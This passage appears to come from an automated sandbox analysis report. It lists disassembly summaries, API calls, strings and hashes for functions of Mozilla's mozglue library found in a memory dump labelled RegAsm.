                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                        • API String ID: 3256780453-3980470659
                                                        • Opcode ID: a454cf5ca35f45a59ac70460eef3b3a12d1443dc77249a7a8d4fcdf6adfe4f33
                                                        • Instruction ID: 12b1595611fb961b9f55fe8935c715a6ed2476a2cb6f2067c5756431d8f337f9
                                                        • Opcode Fuzzy Hash: a454cf5ca35f45a59ac70460eef3b3a12d1443dc77249a7a8d4fcdf6adfe4f33
                                                        • Instruction Fuzzy Hash: 4C52D4B1A003159BEB21DF28CC84BAA77F8EF45708F118599E9199B640DB70BF85CF91
                                                        Function 6C10F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10F09B
                                                          • Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
                                                          • Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
                                                          • Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
                                                          • Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C10F0AC
                                                          • Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
                                                          • Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C10F0BE
                                                          • Part of subcall function 6C0E5C50: __aulldiv.LIBCMT ref: 6C0E5DB4
                                                          • Part of subcall function 6C0E5C50: LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10F155
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F1E0
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F1ED
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F212
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F229
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F231
                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F248
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F2AE
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F2BB
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F2F8
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F350
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F35D
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F381
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F398
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F3A0
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F489
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F491
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F3CF
                                                          • Part of subcall function 6C10F070: GetCurrentThreadId.KERNEL32 ref: 6C10F440
                                                          • Part of subcall function 6C10F070: AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F44D
                                                          • Part of subcall function 6C10F070: ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F472
                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F4A8
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F559
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F561
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F577
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F585
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F5A3
                                                        Strings
                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C10F3A8
                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C10F56A
                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C10F499
                                                        • [I %d/%d] profiler_resume, xrefs: 6C10F239
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                        • API String ID: 565197838-2840072211
                                                        • Opcode ID: a3f5b91a3b2b83331eaae4e43ae001530646ae7e9f67fc6b0b80cdfc813b63fd
                                                        • Instruction ID: 036fd2e8f1bba4ae834b0370474db7c6b0c8b71608de556af70390913e8f2f25
                                                        • Opcode Fuzzy Hash: a3f5b91a3b2b83331eaae4e43ae001530646ae7e9f67fc6b0b80cdfc813b63fd
                                                        • Instruction Fuzzy Hash: D7D116757042048FDB00FF68D4157AA77F8EB8632CF14862AE93593B81DF749809DBA6
                                                        Function 6C0D64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0D64DF
                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0D64F2
                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C0D6505
                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C0D6518
                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0D652B
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0D671C
                                                        • GetCurrentProcess.KERNEL32 ref: 6C0D6724
                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0D672F
                                                        • GetCurrentProcess.KERNEL32 ref: 6C0D6759
                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0D6764
                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C0D6A80
                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0D6ABE
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D6AD3
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D6AE8
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D6AF7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                        • API String ID: 487479824-2878602165
                                                        • Opcode ID: e9a90d1632a153d953eecf595b827702d11d19d09d1e67a8f323fd155c37cd82
                                                        • Instruction ID: b11a715022aecde092ab6367d8904b8c6375c06f923a2030efbfeb8bbb253d8e
                                                        • Opcode Fuzzy Hash: e9a90d1632a153d953eecf595b827702d11d19d09d1e67a8f323fd155c37cd82
                                                        • Instruction Fuzzy Hash: 0CF1D2709053299FDB20DF24CC88B9AB7F5AF46318F1586D9E819A7681D731BE84CF90
                                                        Function 6C10E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,6C10E2A6), ref: 6C10E35E
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C10E2A6), ref: 6C10E386
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10E3E4
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E3F1
                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C10E4AB
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E4F5
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10E577
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E584
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E5DE
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C10E8A6
                                                          • Part of subcall function 6C0CB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0CB7CF
                                                          • Part of subcall function 6C0CB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB808
                                                          • Part of subcall function 6C11B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C140FB6,00000000,?,?,6C10E69E), ref: 6C11B830
                                                        • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C10E6DA
                                                          • Part of subcall function 6C11B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C11B916
                                                          • Part of subcall function 6C11B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C11B94A
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C10E864
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E883
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                        • API String ID: 2698983630-53385798
                                                        • Opcode ID: 6b2e02faf4c13510ec7f784b25a8b1db323f9d072fc0cedbe7368c64ae78fef9
                                                        • Instruction ID: cad19db189804caa86eccc7ae6eeba8c88aa96c28109c2ebfecfb41bcb510053
                                                        • Opcode Fuzzy Hash: 6b2e02faf4c13510ec7f784b25a8b1db323f9d072fc0cedbe7368c64ae78fef9
                                                        • Instruction Fuzzy Hash: 1402AA75704205DFCB10DF29C484A6ABBF5FF89308F14892DE89A9BB40DB30EA55CB91
                                                        Function 6C0EED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C0EEE7A
                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C0EEFB5
                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C0F1695
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F16B4
                                                        • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C0F1770
                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C0F1A3E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memset$freemallocmemcpy
                                                        • String ID:
                                                        • API String ID: 3693777188-0
                                                        • Opcode ID: c8e13dbddeb48076046c351c837d1b814797ab792448dc54af605995d2f353de
                                                        • Instruction ID: 165a833fd323489730c1e386edb9866b5c48658b2b49394a8226772140dbe330
                                                        • Opcode Fuzzy Hash: c8e13dbddeb48076046c351c837d1b814797ab792448dc54af605995d2f353de
                                                        • Instruction Fuzzy Hash: B3B31971E04219CFCB14CFA8C890B9DB7F2BF89314F6581A9D859AB745D730A986CF90
                                                        Function 6C107E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpystrlen
                                                        • String ID: (pre-xul)$data$name$schema
                                                        • API String ID: 3412268980-999448898
                                                        • Opcode ID: 02354f14eff357974a6accc8d1b3b2c5fecf0cee2a3daff657456164a8c28bd7
                                                        • Instruction ID: d15e6b665b70b641ea5a80efb3c288753fa7effefa30ed2e25710c810f82035e
                                                        • Opcode Fuzzy Hash: 02354f14eff357974a6accc8d1b3b2c5fecf0cee2a3daff657456164a8c28bd7
                                                        • Instruction Fuzzy Hash: DDE15EB1B043548FC710CF68884176BF7E9BF89318F15892DE899A7791DB70ED098B92
                                                        Function 6C0ED4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED4F2
                                                        • LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED50B
                                                          • Part of subcall function 6C0CCFE0: EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
                                                          • Part of subcall function 6C0CCFE0: LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED52E
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED690
                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0ED6A6
                                                        • LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED712
                                                        • LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED751
                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0ED7EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                        • API String ID: 2690322072-3894294050
                                                        • Opcode ID: ee2458e7fdb0af59df3a002d4306a4b4723c99188cbd3cb6ea036e7414ac2f5d
                                                        • Instruction ID: d98518b14e1108d93156926c9657aacde67557c38bfcf7d3dd6be3f3eabe60c2
                                                        • Opcode Fuzzy Hash: ee2458e7fdb0af59df3a002d4306a4b4723c99188cbd3cb6ea036e7414ac2f5d
                                                        • Instruction Fuzzy Hash: D791BF71A447018FD714DF29C49072AB7E2EFC9318F55892EE5AAC7B81E730E945CB82
                                                        Function 6C124EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(000007D0), ref: 6C124EFF
                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C124F2E
                                                        • moz_xmalloc.MOZGLUE ref: 6C124F52
                                                        • memset.VCRUNTIME140(00000000,00000000), ref: 6C124F62
                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1252B2
                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1252E6
                                                        • Sleep.KERNEL32(00000010), ref: 6C125481
                                                        • free.MOZGLUE(?), ref: 6C125498
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                        • String ID: (
                                                        • API String ID: 4104871533-3887548279
                                                        • Opcode ID: 68403b335855892f399af229945a4b1a5b3331fd3e7c4bb0232da8a358de88e2
                                                        • Instruction ID: d3ef0b518d60147cb35c36e7ce0ab2d6026b13f7d2972bb1721a878b6fda7ff0
                                                        • Opcode Fuzzy Hash: 68403b335855892f399af229945a4b1a5b3331fd3e7c4bb0232da8a358de88e2
                                                        • Instruction Fuzzy Hash: 9EF1D271A18B408FC716DF38C85062BB7F5AFD6298F05C72EF85AA7651DB31D8428B81
                                                        Function 6C0D7810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E744), ref: 6C0D7885
                                                        • LeaveCriticalSection.KERNEL32(6C14E744), ref: 6C0D78A5
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0D78AD
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0D78CD
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0D78D4
                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0D78E9
                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C0D795D
                                                        • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0D79BB
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C0D7BBC
                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0D7C82
                                                        • LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C0D7CD2
                                                        • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C0D7DAF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeavememset
                                                        • String ID:
                                                        • API String ID: 759993129-0
                                                        • Opcode ID: e75b2295fe2cfe153fbb1c5fb1b73653b0cd08ec4f698839231d3b46b639e751
                                                        • Instruction ID: 09159f0e978725f348cbe4670b813629fe8864b67d963712d76666a8d3a283ab
                                                        • Opcode Fuzzy Hash: e75b2295fe2cfe153fbb1c5fb1b73653b0cd08ec4f698839231d3b46b639e751
                                                        • Instruction Fuzzy Hash: DC023C71A013198FDB54CF19D984799B7F5FF88318F6682AAD809A7615D730BE90CF80
                                                        Function 6C105190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1051DF
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10529C
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C1052FF
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10536D
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1053F7
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C1056C3
                                                        • __Init_thread_footer.LIBCMT ref: 6C1056E0
                                                        Strings
                                                        • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C1056BE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                        • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                        • API String ID: 1227157289-345010206
                                                        • Opcode ID: c2d7863f19ac58667b9a51ea8cccf2b9314242bb253b873063191348c8ea3e36
                                                        • Instruction ID: d7bbb12d0cd515ec6455c76e32e02160ffbf1831c7e4d59eb8a056332abfb55f
                                                        • Opcode Fuzzy Hash: c2d7863f19ac58667b9a51ea8cccf2b9314242bb253b873063191348c8ea3e36
                                                        • Instruction Fuzzy Hash: EEE18D75A14F45CAC712DF358850267B7B9BFAB388F10DB0EE8AF2A951DF30A4469701
                                                        Function 6C127030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 6C127046
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C127060
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C12707E
